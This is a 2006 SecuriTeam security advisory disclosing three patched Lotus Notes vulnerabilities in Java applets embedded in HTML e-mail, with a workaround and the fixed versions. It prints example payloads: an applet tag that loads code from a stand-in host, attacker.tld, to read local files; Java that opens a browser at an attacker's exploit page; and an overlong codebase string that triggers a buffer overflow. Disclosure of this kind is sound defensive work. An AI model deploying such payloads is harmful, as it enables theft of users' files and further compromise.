[NT] Details of Lotus Notes Java Applet vulnerabilities
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 10 Oct 2006 18:06:29 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Details of Lotus Notes Java Applet vulnerabilities
------------------------------------------------------------------------
SUMMARY
Lotus Notes is "a groupware/e-mail system developed by Lotus Software. Due
to its security and collaboration features it's used particularly by large
organizations, government agencies, etc. IBM estimates it is used by 60
million people".
Out of academic interest, Jouko is posting some technical details of three
old Lotus Notes 6.0x/6.5x vulnerabilities. IBM was notified during
July-August 2004 and a fix is available.
DETAILS
Vulnerable Systems:
* Lotus Notes version 6.5.3 and prior
* Lotus Notes version 6.0.4 and prior
Immune Systems:
* Lotus Notes version 6.5.4
* Lotus Notes version 6.0.5
The vulnerabilities involve Java applets embedded in HTML formatted e-mail
messages. A contributing factor in all of the issues is that such Java
applets are automatically displayed when the e-mail message is viewed
(unlike with most e-mail clients).
Vulnerability 1: global file read access
An e-mail message containing a Java Applet with the codebase "file:///"
gains unlimited read access to local files when the e-mail is viewed. An
example HTML snippet follows:
<applet codebase="file:///"
archive="http://www.attacker.tld/applet.jar";
width="1" height="1"></applet>
The applet's Java bytecode itself needn't be contained in the e-mail but
it's only referenced by the archive URL. The applet gets automatically
loaded when the e-mail is viewed. It has file read access on the local
system (can read whatever files the currently logged in user can, and list
hard drive contents). The applet can use e.g. JavaScript to relay the
files to the attacker.
Vulnerability 2: launching web browser
A Java applet embedded in the same way can forcibly launch a web browser
with the desired URL when an e-mail message is viewed. An example piece of
Java code to do this follows:
public void init() {
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html";);
}
Under default settings, Internet Explorer is launched and the attacker
supplied URL is opened in it when the e-mail message is viewed. This
exposes the system to Internet Explorer vulnerabilities, greatly widening
the attack surface.
Vulnerability 3: codebase buffer overflow
Opening an HTML e-mail message which contains an applet tag with a long
codebase parameter (over 500 bytes) causes an apparently stack-based
buffer overflow condition. It may be exploitable to run arbitrary code on
the victim system when the e-mail message is viewed. This is an example
piece of HTML to produce it:
<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA"
code="java.applet.Applet" width=100 height=100></applet>
Exploitability of this scenario was NOT confirmed.
Workaround:
Disabling Java applets can be used to protect from these vulnerabilities.
To disable Java applets, select File -> Preferences -> User Preferences
from the Notes client menu and uncheck the option for "Enable Java
applets."
Solution:
The issues have been addressed in Lotus Notes versions 6.5.4 and 6.0.5.
For detailed fix information, see
<http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en> http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en
ADDITIONAL INFORMATION
The information has been provided by <mailto:jouko@xxxxxx> Jouko
Pynnonen.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] Moodle tag Parameter SQL Injection
- Next by Date: [UNIX] FreeBSD ptrace PT_LWPINFO DoS
- Previous by thread: [UNIX] Moodle tag Parameter SQL Injection
- Next by thread: [UNIX] FreeBSD ptrace PT_LWPINFO DoS
- Index(es):
Relevant Pages
|
|
